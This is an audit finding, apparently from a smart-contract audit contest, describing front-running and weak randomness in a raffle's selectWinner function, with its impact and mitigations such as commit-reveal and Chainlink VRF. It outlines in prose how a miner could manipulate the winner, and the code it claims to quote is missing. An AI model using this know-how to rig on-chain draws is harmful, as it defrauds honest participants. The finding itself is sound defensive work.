Potential for Front-Running in `selectWinner`
Vulnerability Details
The selectWinner function is designed to randomly select a winner among the participants. However, being a public function, it is susceptible to front-running attacks. The function uses the following code to select a winner:
Impact
Manipulation of Results: A malicious actor, especially one with the ability to influence transaction order (like a miner), could exploit this vulnerability to increase their chances of winning. They can do this by ensuring their transaction is the last to be included in a block or by placing their address in a favorable position within the
playersarray.Loss of Fairness: If participants can influence the outcome of the raffle, it undermines the fairness and integrity of the game, leading to a loss of trust among users.
Economic Impact: The potential to manipulate results could lead to financial losses for honest participants and unjust gains for the attacker.
Recommendations
Implement Commit-Reveal Scheme: A commit-reveal scheme could mitigate front-running. In this scheme, players submit a hash of their choice (commit) in one transaction and reveal their actual choice in a subsequent transaction, making it difficult to predict or manipulate outcomes.
Time-Lock Mechanism: Implementing a time-lock mechanism that prevents any changes to the
playersarray shortly before the winner selection could reduce the risk of last-minute manipulations.Randomness Improvement: Utilize external oracles or other secure sources of randomness to select winners. Services like Chainlink VRF (Verifiable Random Function) provide verifiable randomness that is difficult to manipulate.
Lead Judging Commences
weak-randomness
Root cause: bad RNG Impact: manipulate winner
selectWinner can be frontran
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.